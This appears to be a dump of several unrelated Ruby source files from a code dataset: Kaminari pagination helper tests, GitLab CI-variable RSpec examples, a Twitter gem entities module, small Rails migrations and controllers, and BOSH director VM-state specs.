assert_equal 'Displaying <b>1</b> user', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(1).per(25)
assert_equal 'Displaying <b>1</b> member', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'having more than 1 but less than a page of entries' do
setup do
10.times {|i| User.create! name: "user#{i}"}
end
test 'with default entry name' do
users = User.page(1).per(25)
assert_equal 'Displaying <b>all 10</b> users', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(1).per(25)
assert_equal 'Displaying <b>all 10</b> members', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'having more than one page of entries' do
setup do
50.times {|i| User.create! name: "user#{i}"}
end
sub_test_case 'the first page' do
test 'with default entry name' do
users = User.page(1).per(25)
assert_equal 'Displaying users <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(1).per(25)
assert_equal 'Displaying members <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'the next page' do
test 'with default entry name' do
users = User.page(2).per(25)
assert_equal 'Displaying users <b>26 - 50</b> of <b>50</b> in total', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(2).per(25)
assert_equal 'Displaying members <b>26 - 50</b> of <b>50</b> in total', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'the last page' do
test 'with default entry name' do
begin
User.max_pages 4
users = User.page(4).per(10)
assert_equal 'Displaying users <b>31 - 40</b> of <b>50</b> in total', view.page_entries_info(users)
ensure
User.max_pages nil
end
end
end
test 'it accepts a decorated object' do
page_info_presenter = Class.new(SimpleDelegator) do
include ActionView::Helpers::NumberHelper
def total_count
number_with_delimiter(1_000)
end
end
users = page_info_presenter.new(User.page(1).per(25))
assert_equal 'Displaying users <b>1 - 25</b> of <b>1,000</b> in total', view.page_entries_info(users)
end
end
end
sub_test_case 'I18n' do
setup do
50.times {|i| User.create! name: "user#{i}"}
end
test 'page_entries_info translates entry' do
users = User.page(1).per(25)
begin
I18n.backend.store_translations(:en, User.i18n_scope => { models: { user: { one: "person", other: "people" } } })
assert_equal 'Displaying people <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(users)
ensure
I18n.backend.reload!
end
end
sub_test_case 'with any other locale' do
teardown do
I18n.backend.reload!
end
sub_test_case ':de' do
setup do
I18n.locale = :de
I18n.backend.store_translations(:de,
helpers: {
page_entries_info: {
one_page: {
display_entries: {
one: "Displaying <b>1</b> %{entry_name}",
other: "Displaying <b>all %{count}</b> %{entry_name}"
}
},
more_pages: {
display_entries: "Displaying %{entry_name} <b>%{first} - %{last}</b> of <b>%{total}</b> in total"
}
}
}
)
end
test 'with default entry name' do
users = User.page(1).per(50)
assert_equal 'Displaying <b>all 50</b> Benutzer', view.page_entries_info(users, entry_name: 'Benutzer')
end
test 'the last page with default entry name' do
User.max_pages 4
users = User.page(4).per(10)
assert_equal 'Displaying Benutzer <b>31 - 40</b> of <b>50</b> in total', view.page_entries_info(users, entry_name: 'Benutzer')
end
end
end
sub_test_case ':fr' do
setup do
I18n.locale = :fr
ActiveSupport::Inflector.inflections(:fr) do |inflect|
inflect.plural(/$/, 's')
inflect.singular(/s$/, '')
end
I18n.backend.store_translations(:fr,
helpers: {
page_entries_info: {
one_page: {
display_entries: {
one: "Displaying <b>1</b> %{entry_name}",
other: "Displaying <b>all %{count}</b> %{entry_name}"
}
},
more_pages: {
display_entries: "Displaying %{entry_name} <b>%{first} - %{last}</b> of <b>%{total}</b> in total"
}
}
}
)
end
sub_test_case 'having 1 entry' do
setup do
User.delete_all
User.create! name: 'user1'
end
test 'with default entry name' do
users = User.page(1).per(25)
assert_equal 'Displaying <b>1</b> utilisateur', view.page_entries_info(users, entry_name: 'utilisateur')
end
end
test 'having multiple entries with default entry name' do
users = User.page(1).per(50)
assert_equal 'Displaying <b>all 50</b> utilisateurs', view.page_entries_info(users, entry_name: 'utilisateur')
end
test 'the last page with default entry name' do
User.max_pages 4
users = User.page(4).per(10)
assert_equal 'Displaying utilisateurs <b>31 - 40</b> of <b>50</b> in total', view.page_entries_info(users, entry_name: 'utilisateur')
end
end
end
sub_test_case 'on a model with namespace' do
teardown do
User::Address.delete_all
end
test 'having no entries' do
addresses = User::Address.page(1).per(25)
assert_equal 'No addresses found', view.page_entries_info(addresses)
end
sub_test_case 'having 1 entry' do
setup do
User::Address.create!
end
test 'with default entry name' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying <b>1</b> address', view.page_entries_info(addresses)
end
test 'setting the entry name option to "place"' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying <b>1</b> place', view.page_entries_info(addresses, entry_name: 'place')
end
end
sub_test_case 'having more than 1 but less than a page of entries' do
setup do
10.times { User::Address.create! }
end
test 'with default entry name' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying <b>all 10</b> addresses', view.page_entries_info(addresses)
end
test 'setting the entry name option to "place"' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying <b>all 10</b> places', view.page_entries_info(addresses, entry_name: 'place')
end
end
sub_test_case 'having more than one page of entries' do
setup do
50.times { User::Address.create! }
end
sub_test_case 'the first page' do
test 'with default entry name' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying addresses <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(addresses)
end
test 'setting the entry name option to "place"' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying places <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(addresses, entry_name: 'place')
end
end
sub_test_case 'the next page' do
test 'with default entry name' do
addresses = User::Address.page(2).per(25)
assert_equal 'Displaying addresses <b>26 - 50</b> of <b>50</b> in total', view.page_entries_info(addresses)
end
test 'setting the entry name option to "place"' do
addresses = User::Address.page(2).per(25)
assert_equal 'Displaying places <b>26 - 50</b> of <b>50</b> in total', view.page_entries_info(addresses, entry_name: 'place')
end
end
end
end
test 'on a PaginatableArray' do
numbers = Kaminari.paginate_array(%w{one two three}).page(1)
assert_equal 'Displaying <b>all 3</b> entries', view.page_entries_info(numbers)
end
end
sub_test_case '#rel_next_prev_link_tags' do
setup do
31.times {|i| User.create! name: "user#{i}"}
end
test 'the first page' do
users = User.page(1).per(10)
html = view.rel_next_prev_link_tags users, params: {controller: 'users', action: 'index'}
assert_not_match(/rel="prev"/, html)
assert_match(/rel="next"/, html)
assert_match(/\?page=2/, html)
end
test 'the second page' do
users = User.page(2).per(10)
html = view.rel_next_prev_link_tags users, params: {controller: 'users', action: 'index'}
assert_match(/rel="prev"/, html)
assert_not_match(/\?page=1/, html)
assert_match(/rel="next"/, html)
assert_match(/\?page=3/, html)
end
test 'the last page' do
users = User.page(4).per(10)
html = view.rel_next_prev_link_tags users, params: {controller: 'users', action: 'index'}
assert_match(/rel="prev"/, html)
assert_match(/\?page=3"/, html)
assert_not_match(/rel="next"/, html)
end
end
sub_test_case '#path_to_next_page' do
setup do
2.times {|i| User.create! name: "user#{i}"}
end
test 'the first page' do
users = User.page(1).per(1)
assert_equal '/users?page=2', view.path_to_next_page(users, params: {controller: 'users', action: 'index'})
end
test 'the last page' do
users = User.page(2).per(1)
assert_nil view.path_to_next_page(users, params: {controller: 'users', action: 'index'})
end
end
sub_test_case '#path_to_prev_page' do
setup do
3.times {|i| User.create! name: "user#{i}"}
end
test 'the first page' do
users = User.page(1).per(1)
assert_nil view.path_to_prev_page(users, params: {controller: 'users', action: 'index'})
end
test 'the second page' do
users = User.page(2).per(1)
assert_equal '/users', view.path_to_prev_page(users, params: {controller: 'users', action: 'index'})
end
test 'the last page' do
users = User.page(3).per(1)
assert_equal'/users?page=2', view.path_to_prev_page(users, params: {controller: 'users', action: 'index'})
end
end
sub_test_case '#next_page_url' do
setup do
2.times {|i| User.create! name: "user#{i}"}
end
test 'the first page' do
users = User.page(1).per(1)
assert_equal 'http://test.host/users?page=2', view.next_page_url(users, params: {controller: 'users', action: 'index'})
end
test 'the last page' do
users = User.page(2).per(1)
assert_nil view.next_page_url(users, params: {controller: 'users', action: 'index'})
end
end
sub_test_case '#prev_page_url' do
setup do
3.times {|i| User.create! name: "user#{i}"}
end
test 'the first page' do
users = User.page(1).per(1)
assert_nil view.prev_page_url(users, params: {controller: 'users', action: 'index'})
end
test 'the second page' do
users = User.page(2).per(1)
assert_equal 'http://test.host/users', view.prev_page_url(users, params: {controller: 'users', action: 'index'})
end
test 'the last page' do
users = User.page(3).per(1)
assert_equal'http://test.host/users?page=2', view.prev_page_url(users, params: {controller: 'users', action: 'index'})
end
end
end
end
| 35.530405 | 162 | 0.574451 |
332ab37c7b826be854125f2f860d91713aa09e56 | 120 | class AddCarNumberToScans < ActiveRecord::Migration
def change
add_column :scans, :car_number, :integer
end
end
| 20 | 51 | 0.766667 |
e80722857ec86dc059bcda6ebdb646ac4dfd2be2 | 3,386 | shared_examples 'GET #show lists all variables' do
it 'renders the variables as json' do
subject
expect(response).to match_response_schema('variables')
end
it 'has only one variable' do
subject
expect(json_response['variables'].count).to eq(1)
end
end
shared_examples 'PATCH #update updates variables' do
let(:variable_attributes) do
{ id: variable.id,
key: variable.key,
secret_value: variable.value,
protected: variable.protected?.to_s }
end
let(:new_variable_attributes) do
{ key: 'new_key',
secret_value: 'dummy_value',
protected: 'false' }
end
context 'with invalid new variable parameters' do
let(:variables_attributes) do
[
variable_attributes.merge(secret_value: 'other_value'),
new_variable_attributes.merge(key: '...?')
]
end
it 'does not update the existing variable' do
expect { subject }.not_to change { variable.reload.value }
end
it 'does not create the new variable' do
expect { subject }.not_to change { owner.variables.count }
end
it 'returns a bad request response' do
subject
expect(response).to have_gitlab_http_status(:bad_request)
end
end
context 'with duplicate new variable parameters' do
let(:variables_attributes) do
[
new_variable_attributes,
new_variable_attributes.merge(secret_value: 'other_value')
]
end
it 'does not update the existing variable' do
expect { subject }.not_to change { variable.reload.value }
end
it 'does not create the new variable' do
expect { subject }.not_to change { owner.variables.count }
end
it 'returns a bad request response' do
subject
expect(response).to have_gitlab_http_status(:bad_request)
end
end
context 'with valid new variable parameters' do
let(:variables_attributes) do
[
variable_attributes.merge(secret_value: 'other_value'),
new_variable_attributes
]
end
it 'updates the existing variable' do
expect { subject }.to change { variable.reload.value }.to('other_value')
end
it 'creates the new variable' do
expect { subject }.to change { owner.variables.count }.by(1)
end
it 'returns a successful response' do
subject
expect(response).to have_gitlab_http_status(:ok)
end
it 'has all variables in response' do
subject
expect(response).to match_response_schema('variables')
end
end
context 'with a deleted variable' do
let(:variables_attributes) { [variable_attributes.merge(_destroy: 'true')] }
it 'destroys the variable' do
expect { subject }.to change { owner.variables.count }.by(-1)
expect { variable.reload }.to raise_error ActiveRecord::RecordNotFound
end
it 'returns a successful response' do
subject
expect(response).to have_gitlab_http_status(:ok)
end
it 'has all variables in response' do
subject
expect(response).to match_response_schema('variables')
end
end
context 'for variables of type file' do
let(:variables_attributes) do
[
new_variable_attributes.merge(variable_type: 'file')
]
end
it 'creates new variable of type file' do
expect { subject }.to change { owner.variables.file.count }.by(1)
end
end
end
| 24.897059 | 80 | 0.670112 |
6294c6f3561449e1a5b573ca942aa69bc51d7e68 | 2,321 | require 'memoizable'
require 'twitter/entity/hashtag'
require 'twitter/entity/symbol'
require 'twitter/entity/uri'
require 'twitter/entity/user_mention'
require 'twitter/media_factory'
module Twitter
module Entities
include Memoizable
# @return [Boolean]
def entities?
!@attrs[:entities].nil? && @attrs[:entities].any? { |_, array| array.any? }
end
memoize :entities?
# @note Must include entities in your request for this method to work
# @return [Array<Twitter::Entity::Hashtag>]
def hashtags
entities(Entity::Hashtag, :hashtags)
end
memoize :hashtags
# @return [Boolean]
def hashtags?
hashtags.any?
end
memoize :hashtags?
# @note Must include entities in your request for this method to work
# @return [Array<Twitter::Media>]
def media
extended_entities = entities(MediaFactory, :media, :extended_entities)
extended_entities.empty? ? entities(MediaFactory, :media) : extended_entities
end
memoize :media
# @return [Boolean]
def media?
media.any?
end
memoize :media?
# @note Must include entities in your request for this method to work
# @return [Array<Twitter::Entity::Symbol>]
def symbols
entities(Entity::Symbol, :symbols)
end
memoize :symbols
# @return [Boolean]
def symbols?
symbols.any?
end
memoize :symbols?
# @note Must include entities in your request for this method to work
# @return [Array<Twitter::Entity::URI>]
def uris
entities(Entity::URI, :urls)
end
memoize :uris
alias urls uris
# @return [Boolean]
def uris?
uris.any?
end
alias urls? uris?
# @note Must include entities in your request for this method to work
# @return [Array<Twitter::Entity::UserMention>]
def user_mentions
entities(Entity::UserMention, :user_mentions)
end
memoize :user_mentions
# @return [Boolean]
def user_mentions?
user_mentions.any?
end
memoize :user_mentions?
private
# @param klass [Class]
# @param key2 [Symbol]
# @param key1 [Symbol]
def entities(klass, key2, key1 = :entities)
@attrs.fetch(key1.to_sym, {}).fetch(key2.to_sym, []).collect do |entity|
klass.new(entity)
end
end
end
end
| 23.927835 | 83 | 0.651874 |
b995568da43f0a0ce7ef271aaf7579b7a8515461 | 283 | # Encoding: utf-8
require_relative 'spec_helper'
describe 'logstash::default' do
before { logstash_stubs }
describe 'ubuntu' do
let(:chef_run) { ChefSpec::Runner.new.converge(described_recipe) }
it 'writes some chefspec code' do
pending 'todo'
end
end
end
| 18.866667 | 70 | 0.699647 |
08d8b67504772a4e0b4397994afa3d8d163ce850 | 449 | class Myaccount::OrdersController < Myaccount::BaseController
# GET /myaccount/orders
# GET /myaccount/orders.xml
def index
@orders = current_user.completed_orders.find_myaccount_details
end
# GET /myaccount/orders/1
# GET /myaccount/orders/1.xml
def show
@order = current_user.completed_orders.includes([:invoices]).find_by_number(params[:id])
end
private
def selected_myaccount_tab(tab)
tab == 'orders'
end
end
| 23.631579 | 92 | 0.737194 |
ffa68a66cbdcb7aa81416cb794e9fb08882104a9 | 537 | class User < ActiveRecord::Base
#define roles for authorization
enum role: [:user, :admin]
after_initialize :set_default_role, :if => :new_record?
def set_default_role
self.role ||= :user
end
# Include default devise modules. Others available are:
# :confirmable, :lockable, :timeoutable and :omniauthable
devise :database_authenticatable, :registerable,
:recoverable, :rememberable, :trackable, :validatable, :confirmable
#associations
has_many :userobjects
has_many :things, :through => :userobjects
end
| 28.263158 | 76 | 0.743017 |
26a97e1a923125667339a91fbf93d8f91c6d50fb | 176 | class AddSocialLinksToRecruitDocuments < ActiveRecord::Migration[6.0]
def change
add_column :recruit_documents, :social_links, :jsonb, null: false, default: []
end
end
| 29.333333 | 82 | 0.767045 |
871e0ae0c9beaa047b09f77d2428e4309de44c20 | 136 | class AddCommentsCountToProposals < ActiveRecord::Migration
def change
add_column :proposals, :comments_count, :integer
end
end
| 22.666667 | 59 | 0.794118 |
336f4d459ad4fe53823022f3cead997d4780bdd7 | 20,167 | require File.expand_path('../../../spec_helper', __FILE__)
module Bosh::Director
describe Jobs::VmState do
def stub_agent_get_state_to_return_state_with_vitals
expect(agent).to receive(:get_state).with('full').and_return(
'vm_cid' => 'fake-vm-cid',
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
'agent_id' => 'fake-agent-id',
'job_state' => 'running',
'processes' => [
{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' },
],
'cloud_properties' => {},
'vitals' => {
'load' => %w[1 5 15],
'cpu' => { 'user' => 'u', 'sys' => 's', 'wait' => 'w' },
'mem' => { 'percent' => 'p', 'kb' => 'k' },
'swap' => { 'percent' => 'p', 'kb' => 'k' },
'disk' => { 'system' => { 'percent' => 'p' }, 'ephemeral' => { 'percent' => 'p' } },
},
)
end
subject(:job) { Jobs::VmState.new(deployment.id, 'full', instance_details) }
let(:instance_details) { false }
let(:deployment) { Models::Deployment.make }
let(:task) { Bosh::Director::Models::Task.make(id: 42, username: 'user') }
let(:time) { Time.now }
let(:vm) { Models::Vm.make(cid: 'fake-vm-cid', agent_id: 'fake-agent-id', instance_id: instance.id, created_at: time) }
let(:instance) { Models::Instance.make(deployment: deployment) }
before do
allow(Config).to receive(:dns).and_return('domain_name' => 'microbosh', 'db' => {})
allow(Config).to receive(:result).and_return(TaskDBWriter.new(:result_output, task.id))
end
describe 'DJ job class expectations' do
let(:job_type) { :vms }
let(:queue) { :urgent }
it_behaves_like 'a DJ job'
end
describe '#perform' do
before do
allow(AgentClient).to receive(:with_agent_id).with(anything, anything, timeout: 5).and_return(agent)
instance.active_vm = vm
instance.save
end
let(:agent) { instance_double('Bosh::Director::AgentClient') }
it 'parses agent info into vm_state WITHOUT vitals' do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
expect(agent).to receive(:get_state).with('full').and_return(
'vm_cid' => 'fake-vm-cid',
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
'agent_id' => 'fake-agent-id',
'job_state' => 'running',
)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['dns']).to be_empty
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vitals']).to be_nil
expect(status['vm_created_at']).to eq(time.utc.iso8601)
end
context 'when there are two networks' do
before do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('2.2.2.2').to_i.to_s,
task_id: '12345',
)
end
it "returns the ip addresses from 'Models::Instance.ip_addresses'" do
allow(agent).to receive(:get_state).with('full').and_raise(Bosh::Director::RpcTimeout)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['1.1.1.1', '2.2.2.2'])
end
end
context "when 'ip_addresses' is empty for instance" do
before do
vm.network_spec = { 'a' => { 'ip' => '3.3.3.3' }, 'b' => { 'ip' => '4.4.4.4' } }
vm.save
instance.spec = { 'networks' => { 'a' => { 'ip' => '1.1.1.1' }, 'b' => { 'ip' => '2.2.2.2' } } }
instance.save
end
it "returns the ip addresses from 'Models::Vm.network_spec'" do
allow(agent).to receive(:get_state).with('full').and_raise(Bosh::Director::RpcTimeout)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['3.3.3.3', '4.4.4.4'])
end
end
context 'when there are manual ip addresses and networks' do
before do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('2.2.2.2').to_i.to_s,
task_id: '12345',
)
vm.network_spec = {
'a' => { 'ip' => '3.3.3.3' },
'b' => { 'ip' => '4.4.4.4' },
}
vm.save
instance.spec = {
'networks' => {
'a' => { 'ip' => '1.1.1.1' },
'b' => { 'ip' => '2.2.2.2' },
},
}
instance.save
end
it 'returns the static and dynamic ip addresses' do
allow(agent).to receive(:get_state).with('full').and_raise(Bosh::Director::RpcTimeout)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq([
'1.1.1.1', '2.2.2.2', # Static
'3.3.3.3', '4.4.4.4', # Dynamic
])
end
end
it 'parses agent info into vm_state WITH vitals' do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['dns']).to be_empty
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vm_created_at']).to eq(time.utc.iso8601)
expect(status['vitals']['load']).to eq(%w[1 5 15])
expect(status['vitals']['cpu']).to eq('user' => 'u', 'sys' => 's', 'wait' => 'w')
expect(status['vitals']['mem']).to eq('percent' => 'p', 'kb' => 'k')
expect(status['vitals']['swap']).to eq('percent' => 'p', 'kb' => 'k')
expect(status['vitals']['disk']).to eq('system' => { 'percent' => 'p' }, 'ephemeral' => { 'percent' => 'p' })
end
it 'should return DNS A records if they exist' do
instance.update(dns_record_names: ['index.job.network.deployment.microbosh'])
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['dns']).to eq(['index.job.network.deployment.microbosh'])
end
it 'should return DNS A records ordered by instance id records first' do
instance.update(
dns_record_names: [
'0.job.network.deployment.microbosh',
'd824057d-c92f-45a9-ad9f-87da12008b21.job.network.deployment.microbosh',
],
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['dns']).to eq(
['d824057d-c92f-45a9-ad9f-87da12008b21.job.network.deployment.microbosh', '0.job.network.deployment.microbosh'],
)
end
[RpcTimeout, RpcRemoteException].each do |error|
context "when get_state raises an #{error}" do
it 'should handle unresponsive agents' do
instance.update(job: 'dea', index: 50)
expect(agent).to receive(:get_state).with('full').and_raise(error)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['vm_created_at']).to eq(time.utc.iso8601)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('unresponsive agent')
expect(status['job_name']).to eq('dea')
expect(status['index']).to eq(50)
end
end
end
it 'should get the default ignore status of a vm' do
instance
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ignore']).to be(false)
end
it 'should get the ignore status of a vm when updated' do
instance.update(ignore: true)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ignore']).to be(true)
end
it 'should return disk cid(s) info when active disks found' do
Models::PersistentDisk.create(
instance: instance,
active: true,
disk_cid: 'fake-disk-cid',
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['disk_cid']).to eq('fake-disk-cid')
expect(status['disk_cids']).to contain_exactly('fake-disk-cid')
end
it 'should return disk cid(s) info when many active disks found' do
Models::PersistentDisk.create(
instance: instance,
active: true,
disk_cid: 'fake-disk-cid',
)
Models::PersistentDisk.create(
instance: instance,
active: true,
disk_cid: 'fake-disk-cid2',
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['disk_cid']).to eq('fake-disk-cid')
expect(status['disk_cids']).to contain_exactly('fake-disk-cid', 'fake-disk-cid2')
end
it 'should return disk cid(s) info when NO active disks found' do
Models::PersistentDisk.create(
instance: instance,
active: false,
disk_cid: 'fake-disk-cid',
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['disk_cid']).to be_nil
expect(status['disk_cids']).to be_empty
end
it 'should return instance id' do
instance.update(uuid: 'blarg')
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['id']).to eq('blarg')
end
it 'should return vm_type' do
instance.update(spec: { 'vm_type' => { 'name' => 'fake-vm-type', 'cloud_properties' => {} }, 'networks' => [] })
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_type']).to eq('fake-vm-type')
end
it 'should return processes info' do
instance # trigger the let
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' }])
end
context 'when including instances missing vms' do
let(:instance_details) { true }
it 'does not try to contact the agent' do
instance.active_vm = nil
expect(AgentClient).to_not receive(:with_agent_id)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['job_state']).to eq(nil)
end
end
context 'when instance is a bootstrap node' do
it 'should return bootstrap as true' do
instance.update(bootstrap: true)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['bootstrap']).to be_truthy
end
end
context 'when instance is NOT a bootstrap node' do
it 'should return bootstrap as false' do
instance.update(bootstrap: false)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['bootstrap']).to be_falsey
end
end
it 'should return processes info' do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
instance.update(spec: { 'vm_type' => { 'name' => 'fake-vm-type', 'cloud_properties' => {} } })
expect(agent).to receive(:get_state).with('full').and_return(
'vm_cid' => 'fake-vm-cid',
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
'agent_id' => 'fake-agent-id',
'index' => 0,
'job' => { 'name' => 'dea' },
'job_state' => 'running',
'processes' => [
{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' },
],
)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vitals']).to be_nil
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' }])
end
context 'with exclude filter and instances without vms' do
it 'excludes those instances missing vms' do
allow(agent).to receive(:get_state).with('full').and_return(
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
)
expect(job.task_result).to receive(:write).once
job.perform
end
end
context 'when instance has multiple vms' do
let!(:inactive_vm) do
Models::Vm.make(instance: instance, active: false, agent_id: 'other_agent_id', cid: 'fake-vm-cid-2')
end
let(:lazy_agent) { instance_double('Bosh::Director::AgentClient') }
let(:lazy_agent_state) do
{
'vm_cid' => 'fake-vm-cid-2',
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
'agent_id' => 'other_agent_id',
'index' => 0,
'job' => { 'name' => 'dea' },
'job_state' => 'stopped',
'processes' => [
{ 'name' => 'fake-process-1', 'state' => 'stopped' },
{ 'name' => 'fake-process-2', 'state' => 'stopped' },
],
}
end
let(:agent_state) do
{
'vm_cid' => 'fake-vm-cid',
'networks' => { 'test' => { 'ip' => '1.1.1.2' } },
'agent_id' => 'fake-agent-id',
'index' => 0,
'job' => { 'name' => 'dea' },
'job_state' => 'running',
'processes' => [
{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' },
],
}
end
before do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
Models::IpAddress.make(
instance_id: instance.id,
vm_id: inactive_vm.id,
address_str: NetAddr::CIDR.create('1.1.1.2').to_i.to_s,
task_id: '12345',
)
allow(AgentClient).to receive(:with_agent_id).with('other_agent_id', anything, timeout: 5).and_return(lazy_agent)
allow(lazy_agent).to receive(:get_state).with('full').and_return(lazy_agent_state)
allow(agent).to receive(:get_state).with('full').and_return(agent_state)
instance.update(spec: { 'vm_type' => { 'name' => 'fake-vm-type', 'cloud_properties' => {} } })
end
context 'when getting vm states' do
it 'returns all vms, active and inactive' do
job.perform
results = Models::Task.first(id: task.id).result_output.split("\n")
expect(results.length).to eq(2)
results = results.map { |r| JSON.parse(r) }
results.sort_by! { |r| r['ips'][0] }
status = results[0]
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vitals']).to be_nil
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' }])
status = results[1]
expect(status['ips']).to eq(['1.1.1.2'])
expect(status['vm_cid']).to eq('fake-vm-cid-2')
expect(status['active']).to eq(false)
expect(status['agent_id']).to eq('other_agent_id')
expect(status['job_state']).to eq('stopped')
expect(status['vitals']).to be_nil
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'stopped' },
{ 'name' => 'fake-process-2', 'state' => 'stopped' }])
end
end
context 'when getting instance states' do
let(:instance_details) { true }
it 'returns information from active vm' do
job.perform
results = Models::Task.first(id: task.id).result_output.split("\n")
expect(results.length).to eq(1)
status = JSON.parse(results[0])
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vitals']).to be_nil
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' }])
end
end
end
end
end
end
| 37.139963 | 123 | 0.545297 |
